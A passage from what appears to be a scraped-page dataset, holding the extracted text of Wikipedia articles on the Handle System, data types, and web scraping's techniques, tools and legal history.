Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
109 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Hdl_(identifier) | The Handle System is the Corporation for National Research Initiatives's proprietary registry assigning persistent identifiers, or handles, to information resources, and for resolving "those handles into the information necessary to locate, access, and otherwise make use of the resources". 1 As with handles used elsewhere in computing, Handle System handles are opaque, and encode no information about the underlying resource, being bound only to metadata regarding the resource. Consequently, the handles are not rendered invalid by changes to the metadata. The system was developed by Bob Kahn at the Corporation for National Research Initiatives (CNRI) as a part of the Digital Object Architecture (DOA). The original work was funded by the Defense Advanced Research Projects Agency (DARPA) between 1992 and 1996, as part of a wider framework for distributed digital object services, 2 and was thus contemporaneous with the early deployment of the World Wide Web, with similar goals. The Handle System was first implemented in autumn 1994, and was administered and operated by CNRI until December 2015, when a new "multi-primary administrator" (MPA) mode of operation was introduced. The DONA Foundation 3 now administers the system's Global Handle Registry and accredits MPAs, including CNRI and the International DOI Foundation. 4 The system currently provides the underlying infrastructure for such handle-based systems as Digital Object Identifiers and DSpace, which are mainly used to provide access to scholarly, professional and government documents and other information resources. CNRI provides specifications and the source code for reference implementations for the servers and protocols used in the system under a royalty-free "Public License", similar to an open source license. 5 Thousands of handle services are currently running. Over 1000 of these are at universities and libraries, but they are also in operation at national laboratories, research groups, government agencies, and commercial enterprises, receiving over 200 million resolution requests per month. citation needed The Handle System is defined in informational RFCs 3650, 1 3651 6 and 3652 7 of the Internet Engineering Task Force (IETF); it includes an open set of protocols, a namespace, and a reference implementation of the protocols. Documentation, software, and related information is provided by CNRI on a dedicated website 8 Handles consist of a prefix which identifies a "naming authority" and a suffix which gives the "local name" of a resource. Similar to domain names, prefixes are issued to naming authorities by one of the "multi-primary administrators" of the system upon payment of a fee, which must be renewed annually. A naming authority may create any number of handles, with unique "local names", within their assigned prefixes. An example of a handle is: In the first example, which is the handle for the HANDLE.NET software license, 20.1000 is the prefix assigned to the naming authority (in this case, Handle.net itself) and 100 is the local name within that namespace. The local name may consist of any characters from the Unicode UCS 2 character set. The prefix also consists of any UCS 2 characters, other than . The prefixes consist of one or more naming authority segments, separated by periods, representing a hierarchy of naming authorities. Thus, in the example 20 is the naming authority prefix for CNRI, while 1000 designates a subordinate naming authority within the 20 prefix. Other examples of top-level prefixes for the federated naming authorities of the DONA Foundation are 10 for DOI handles; 11 for handles assigned by the ITU; 21 for handles issued by the German Gesellschaft f r wissenschaftliche Datenverarbeitung mbH G ttingen (GWDG), the scientific computing center of the University of G ttingen; and 86 for the Coalition of Handle Services China. Older "legacy" prefixes issued by CNRI before the "multi-primary administrator" (MPA) structure was instituted are typically four of five digits, as in the second example above, a handle administered by the University of Leicester. All prefixes must be registered in the Global Handle Registry through an DONA Foundation approved registrar, normally for a fee. As with other uses of handles in computing, the handle is opaque; that is, it encodes no information about the underlying resource and provides only the means to retrieve metadata about the resource. This may be contrasted with a Uniform Resource Locator (URL), which may encode within the identifier such attributes of the resource as the protocol to be used to access the server holding the resource, the server host name and port number, and perhaps even location specifics such as the name of a file in the server file system containing the resource. In the Handle System, these specifics are not encoded in the handle, but are found in the metadata to which the handle is bound. The metadata may include many attributes of the information resource, such as its locations, the forms in which it is available, the types of access (e.g. "free" versus "paid") offered, and to whom. The processing of the metadata to determine how and where the resource should be accessed, and the provision of the resource to the user, are performed in a separate step, called "resolution", using a Resolver, a server which may be different from the ones involved in exchanging the handle for the metadata. Unlike URLs, which may become invalid if the metadata embedded within them becomes invalid, handles do not become invalid and do not need to change when locations or other metadata attributes change. This helps to prevent link rot, as changes in the information resource (such as location) need only be reflected in changes to the metadata, rather than in changes in every reference to the resource. Each handle may have its own administrator and administration of the handles can be done in a distributed environment, similar to DNS domain names. The name-to-value bindings may also be secured, both via signatures to verify the data and via challenge response to verify the transmission of the data, allowing handles to be used in trust management applications. It is possible for the same underlying information resource to be associated with multiple handles, as when two university libraries generate handles (and therefore possibly different sets of metadata) for the same book. The Handle System is compatible with the Domain Name System (DNS), but does not require it, unlike persistent identifiers such as PURLs or ARKs, which are similar to handles, but which utilise domain names. However, unlike these domain-name based approaches, handles do require a separate prefix registration process and handle servers separate from the domain name servers. Handles can be used natively, or expressed as Uniform Resource Identifiers (URIs) through a namespace within the info URI scheme; 9 10 for example, 20.1000 100 may be written as the URI, info:hdl 20.1000 100. Some Handle System namespaces, such as Digital Object Identifiers, are "info: URI namespaces in their own right; for example, info:doi 10.1000 182 is another way of writing the handle for the current revision of the DOI Handbook 11 as a URI. Some Handle System namespaces define special presentation rules. For example, Digital Object Identifiers, which represent a high percentage of the extant handles, are usually presented with a "doi: prefix: doi:10.1000 182. Any Handle may be expressed as a Uniform Resource Locator (URL) through the use of the generic HTTP proxy server: 12 Some Handle-based systems offer an HTTP proxy server that is intended for use with their own system such as: Implementation of the Handle System consists of Local Handle Services, each of which is made up of one or more sites that provide the servers that store specific handles. The Global Handle Registry is a unique Local Handle Service which stores information on the prefixes (also known as naming authorities) within the Handle System and can be queried to find out where specific handles are stored on other Local Handle Services within this distributed system. The Handle System website provides a series of implementation tools, notably the HANDLE.NET Software 13 and HANDLE.NET Client Libraries. 14 Handle clients can be embedded in end user software (e.g., a web browser) or in server software (e.g., a web server) and extensions are already available for Adobe Acrobat 15 and Firefox. 16 Handle client software libraries are available in both C and Java. Some applications have developed specific add-on tools, e.g., for the DOI System. 17 The interoperable network of distributed handle resolver servers (also known as the Proxy Server System) are linked through a Global Resolver (which is one logical entity though physically decentralised and mirrored). Users of Handle System technology obtain a handle prefix created in the Global Handle Registry. The Global Handle Registry maintains and resolves the prefixes of locally maintained handle services. Any local handle service can, therefore, resolve any handle through the Global Resolver. Handles (identifiers) are passed by a client, as a query of the naming authority prefix, to the Handle System's Global Handle Registry (GHR). The GHR responds by sending the client the location information for the relevant Local Handle Service (which may consist of multiple servers in multiple sites); a query is then sent to the relevant server within the Local Handle Service. The Local Handle Service returns the information needed to acquire the resource, e.g., a URL which can then be turned into an HTTP redirect. (Note: if the client already has information on the appropriate LHS to query, the initial query to GHR is omitted) Though the original model from which the Handle System derives dealt with management of digital objects, the Handle System does not mandate any particular model of relationships between the identified entities, nor is it limited to identifying only digital objects: non-digital entities may be represented as a corresponding digital object for the purposes of digital object management. Some care is needed in the definition of such objects and how they relate to non-digital entities; there are established models that can aid in such definitions e.g., Functional Requirements for Bibliographic Records (FRBR), CIDOC CRM, and indecs content model. Some applications have found it helpful to marry such a framework to the handle application: for example, the Advanced Distributed Learning (ADL) Initiative 18 brings together Handle System application with existing standards for distributed learning content, using a Shareable Content Object Reference Model (SCORM), 19 and the Digital Object Identifier (DOI) system implementation of the Handle System has adopted it together with the indecs framework to deal with semantic interoperability. The Handle System also makes explicit the importance of organizational commitment to a persistent identifier scheme, but does not mandate one model for ensuring such commitment. Individual applications may choose to establish their own sets of rules and social infrastructure to ensure persistence (e.g., when used in the DSpace application, and the DOI application). 20 The Handle system is designed to meet the following requirements to contribute to persistence 21 The identifier string: The identifier resolution mechanism: Among the objects that are currently identified by handles are journal articles, technical reports, books, theses and dissertations, government documents, metadata, distributed learning content, and data sets. Handles are being used in digital watermarking applications, GRID applications, repositories, and more. Although individual users may download and use the HANDLE.NET software independently, many users have found it beneficial to collaborate in developing applications in a federation, using common policy or additional technology to provide shared services. As one of the first persistent identifier schemes, the Handle System has been widely adopted by public and private institutions and proven over several years. (See Paradigm, Persistent identifiers.) 22 Handle System applications may use handles as simple persistent identifiers (as most commonly used, to resolve to the current URL of an object), or may choose to take advantage of other features. Its support for the simultaneous return as output of multiple pieces of current information related to the object, in defined data structures, enables priorities to be established for the order in which the multiple resolutions will be used. Handles can, therefore, resolve to different digital versions of the same content, to mirror sites, or to different business models (pay vs. free, secure vs. open, public vs. private). They can also resolve to different digital versions of differing content, such as a mix of objects required for a distance-learning course. There are thousands of handle services running today, located in 71 countries, on 6 continents; over 1000 of them run at universities and libraries. Handle services are being run by user federations, national laboratories, universities, computing centers, libraries (national and local), government agencies, contractors, corporations, and research groups. Major publishers use the Handle System for persistent identification of commercially traded and Open Access content through its implementation with the Digital Object Identifier (DOI) system. The number of prefixes, which allow users to assign handles, is growing and stands at over 12,000 as of early 2014. There are six top-level Global Handle Registry servers that receive (on average) 68 million resolution requests per month. Proxy servers known to CNRI, passing requests to the system on the Web, receive (on average) 200 million resolution requests per month. (Statistics from Handle Quick Facts.) In 2010, CNRI and ITU (International Telecommunication Union) entered into an agreement to collaborate on use of the Handle System (and the Digital Object Architecture more generally) and are working on the specific details of that collaboration; in April 2009 ITU listed the Handle System as an "emerging trend". 23 Handle System, HANDLE.NET and Global Handle Registry are trademarks of the Corporation for National Research Initiatives (CNRI), a non-profit research and development corporation in the US. The Handle System is the subject of patents by CNRI, which licenses its Handle System technology through a public license, 24 similar to an open source license, in order to enable broader use of the technology. Handle System infrastructure is supported by prefix registration and service fees, with the majority coming from single prefix holders. The largest current single contributor is the International DOI Foundation. The Public License allows commercial and non-commercial use at low cost of both its patented technology and the reference implementation of the software, and allows the software to be freely embedded in other systems and products. A Service Agreement 5 is also available for users who intend to provide identifier and or resolution services using the Handle System technology under the Handle System public license. The Handle System represents several components of a long-term digital object architecture. In January 2010 CNRI released its general-purpose Digital Object Repository software, 25 another major component of this architecture. More information 26 about the release, including protocol specification, source code and ready-to-use system, clients and utilities, is available. 27 28 |
110 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_type | In computer science and computer programming, a data type (or simply type) is a collection or grouping of data values, usually specified by a set of possible values, a set of allowed operations on these values, and or a representation of these values as machine types. 1 A data type specification in a program constrains the possible values that an expression, such as a variable or a function call, might take. On literal data, it tells the compiler or interpreter how the programmer intends to use the data. Most programming languages support basic data types of integer numbers (of varying sizes), floating-point numbers (which approximate real numbers), characters and Booleans. 2 3 A data type may be specified for many reasons: similarity, convenience, or to focus the attention. It is frequently a matter of good organization that aids the understanding of complex definitions. Almost all programming languages explicitly include the notion of data type, though the possible data types are often restricted by considerations of simplicity, computability, or regularity. An explicit data type declaration typically allows the compiler to choose an efficient machine representation, but the conceptual organization offered by data types should not be discounted. 4 Different languages may use different data types or similar types with different semantics. For example, in the Python programming language, int represents an arbitrary-precision integer which has the traditional numeric operations such as addition, subtraction, and multiplication. However, in the Java programming language, the type int represents the set of 32 bit integers ranging in value from 2,147,483,648 to 2,147,483,647, with arithmetic operations that wrap on overflow. In Rust this 32 bit integer type is denoted i32 and panics on overflow in debug mode. 5 Most programming languages also allow the programmer to define additional data types, usually by combining multiple elements of other types and defining the valid operations of the new data type. For example, a programmer might create a new data type named "complex number" that would include real and imaginary parts, or a color data type represented by three bytes denoting the amounts each of red, green, and blue, and a string representing the color's name. Data types are used within type systems, which offer various ways of defining, implementing, and using them. In a type system, a data type represents a constraint placed upon the interpretation of data, describing representation, interpretation and structure of values or objects stored in computer memory. The type system uses data type information to check correctness of computer programs that access or manipulate the data. A compiler may use the static type of a value to optimize the storage it needs and the choice of algorithms for operations on the value. In many C compilers the float data type, for example, is represented in 32 bits, in accord with the IEEE specification for single-precision floating point numbers. They will thus use floating-point-specific microprocessor operations on those values (floating-point addition, multiplication, etc.). Most data types in statistics have comparable types in computer programming, and vice versa, as shown in the following table: Parnas, Shore Weiss (1976) identified five definitions of a "type" that were used—sometimes implicitly—in the literature: The definition in terms of a representation was often done in imperative languages such as ALGOL and Pascal, while the definition in terms of a value space and behaviour was used in higher-level languages such as Simula and CLU. Types including behavior align more closely with object-oriented models, whereas a structured programming model would tend to not include code, and are called plain old data structures. Data types may be categorized according to several factors: The terminology varies - in the literature, primitive, built-in, basic, atomic, and fundamental may be used interchangeably. 8 All data in computers based on digital electronics is represented as bits (alternatives 0 and 1) on the lowest level. The smallest addressable unit of data is usually a group of bits called a byte (usually an octet, which is 8 bits). The unit processed by machine code instructions is called a word (as of 2011 update , needs update typically 32 or 64 bits). Machine data types expose or make available fine-grained control over hardware, but this can also expose implementation details that make code less portable. Hence machine types are mainly used in systems programming or low-level programming languages. In higher-level languages most data types are abstracted in that they do not have a language-defined machine representation. The C programming language, for instance, supplies types such as Booleans, integers, floating-point numbers, etc., but the precise bit representations of these types are implementation-defined. The only C type with a precise machine representation is the char type that represents a byte. 9 The Boolean type represents the values true and false. Although only two values are possible, they are more often represented as a word rather as a single bit as it requires more machine instructions to store and retrieve an individual bit. Many programming languages do not have an explicit Boolean type, instead using an integer type and interpreting (for instance) 0 as false and other values as true. Boolean data refers to the logical structure of how the language is interpreted to the machine language. In this case a Boolean 0 refers to the logic False. True is always a non zero, especially a one which is known as Boolean 1. Almost all programming languages supply one or more integer data types. They may either supply a small number of predefined subtypes restricted to certain ranges (such as short and long and their corresponding unsigned variants in C C ); or allow users to freely define subranges such as 1..12 (e.g. Pascal Ada). If a corresponding native type does not exist on the target platform, the compiler will break them down into code using types that do exist. For instance, if a 32 bit integer is requested on a 16 bit platform, the compiler will tacitly treat it as an array of two 16 bit integers. Floating point data types represent certain fractional values (rational numbers, mathematically). Although they have predefined limits on both their maximum values and their precision, they are sometimes misleadingly called reals (evocative of mathematical real numbers). They are typically stored internally in the form a 2b (where a and b are integers), but displayed in familiar decimal form. Fixed point data types are convenient for representing monetary values. They are often implemented internally as integers, leading to predefined limits. For independence from architecture details, a Bignum or arbitrary precision numeric type might be supplied. This represents an integer or rational to a precision limited only by the available memory and computational resources on the system. Bignum implementations of arithmetic operations on machine-sized values are significantly slower than the corresponding machine operations. 10 The enumerated type has distinct values, which can be compared and assigned, but which do not necessarily have any particular concrete representation in the computer's memory; compilers and interpreters can represent them arbitrarily. For example, the four suits in a deck of playing cards may be four enumerators named CLUB, DIAMOND, HEART, SPADE, belonging to an enumerated type named suit. If a variable V is declared having suit as its data type, one can assign any of those four values to it. Some implementations allow programmers to assign integer values to the enumeration values, or even treat them as type-equivalent to integers. Strings are a sequence of characters used to store words or plain text, most often textual markup languages representing formatted text. Characters may be a letter of some alphabet, a digit, a blank space, a punctuation mark, etc. Characters are drawn from a character set such as ASCII. Character and string types can have different subtypes according to the character encoding. The original 7 bit wide ASCII was found to be limited, and superseded by 8, 16 and 32 bit sets, which can encode a wide variety of non-Latin alphabets (such as Hebrew and Chinese) and other symbols. Strings may be of either variable length or fixed length, and some programming languages have both types. They may also be subtyped by their maximum size. Since most character sets include the digits, it is possible to have a numeric string, such as "1234". These numeric strings are usually considered distinct from numeric values such as 1234, although some languages automatically convert between them. A union type definition will specify which of a number of permitted subtypes may be stored in its instances, e.g. "float or long integer". In contrast with a record, which could be defined to contain a float and an integer, a union may only contain one subtype at a time. A tagged union (also called a variant, variant record, discriminated union, or disjoint union) contains an additional field indicating its current type for enhanced type safety. An algebraic data type (ADT) is a possibly recursive sum type of product types. A value of an ADT consists of a constructor tag together with zero or more field values, with the number and type of the field values fixed by the constructor. The set of all possible values of an ADT is the set-theoretic disjoint union (sum), of the sets of all possible values of its variants (product of fields). Values of algebraic types are analyzed with pattern matching, which identifies a value's constructor and extracts the fields it contains. If there is only one constructor, then the ADT corresponds to a product type similar to a tuple or record. A constructor with no fields corresponds to the empty product (unit type). If all constructors have no fields then the ADT corresponds to an enumerated type. One common ADT is the option type, defined in Haskell as data Maybe a Nothing Just a. 11 Some types are very useful for storing and retrieving data and are called data structures. Common data structures include: An abstract data type is a data type that does not specify the concrete representation of the data. Instead, a formal specification based on the data type's operations is used to describe it. Any implementation of a specification must fulfill the rules given. For example, a stack has push pop operations that follow a Last-In-First-Out rule, and can be concretely implemented using either a list or an array. Abstract data types are used in formal semantics and program verification and, less strictly, in design. The main non-composite, derived type is the pointer, a data type whose value refers directly to (or "points to") another value stored elsewhere in the computer memory using its address. It is a primitive kind of reference. (In everyday terms, a page number in a book could be considered a piece of data that refers to another one). Pointers are often stored in a format similar to an integer; however, attempting to dereference or "look up" a pointer whose value was never a valid memory address would cause a program to crash. To ameliorate this potential problem, pointers are considered a separate type to the type of data they point to, even if the underlying representation is the same. Functional programming languages treat functions as a distinct datatype and allow values of this type to be stored in variables and passed to functions. Some multi-paradigm languages such as JavaScript also have mechanisms for treating functions as data. 13 Most contemporary type systems go beyond JavaScript's simple type "function object" and have a family of function types differentiated by argument and return types, such as the type Int Bool denoting functions taking an integer and returning a Boolean. In C, a function is not a first-class data type but function pointers can be manipulated by the program. Java and C originally did not have function values but have added them in C 11 and Java 8. A type constructor builds new types from old ones, and can be thought of as an operator taking zero or more types as arguments and producing a type. Product types, function types, power types and list types can be made into type constructors. Universally-quantified and existentially-quantified types are based on predicate logic. Universal quantification is written as x . f ( x ) displaystyle forall x.f(x) or forall x. f x and is the intersection over all types x of the body f x, i.e. the value is of type f x for every x. Existential quantification written as x . f ( x ) displaystyle exists x.f(x) or exists x. f x and is the union over all types x of the body f x, i.e. the value is of type f x for some x. In Haskell, universal quantification is commonly used, but existential types must be encoded by transforming exists a. f a to forall r. (forall a. f a r) r or a similar type. A refinement type is a type endowed with a predicate which is assumed to hold for any element of the refined type. For instance, the type of natural numbers greater than 5 may be written as n N n 5 displaystyle n in mathbb N , ,n 5 A dependent type is a type whose definition depends on a value. Two common examples of dependent types are dependent functions and dependent pairs. The return type of a dependent function may depend on the value (not just type) of one of its arguments. A dependent pair may have a second value of which the type depends on the first value. An intersection type is a type containing those values that are members of two specified types. For example, in Java the class Boolean implements both the Serializable and the Comparable interfaces. Therefore, an object of type Boolean is a member of the type Serializable Comparable. Considering types as sets of values, the intersection type displaystyle sigma cap tau is the set-theoretic intersection of displaystyle sigma and displaystyle tau . It is also possible to define a dependent intersection type, denoted ( x : ) displaystyle (x: sigma ) cap tau , where the type displaystyle tau may depend on the term variable x displaystyle x . 14 Some programming languages represent the type information as data, enabling type introspection and reflection. In contrast, higher order type systems, while allowing types to be constructed from other types and passed to functions as values, typically avoid basing computational decisions on them. citation needed For convenience, high-level languages and databases may supply ready-made "real world" data types, for instance times, dates, and monetary values (currency). 15 16 These may be built-in to the language or implemented as composite types in a library. 17 |
111 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-19 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their 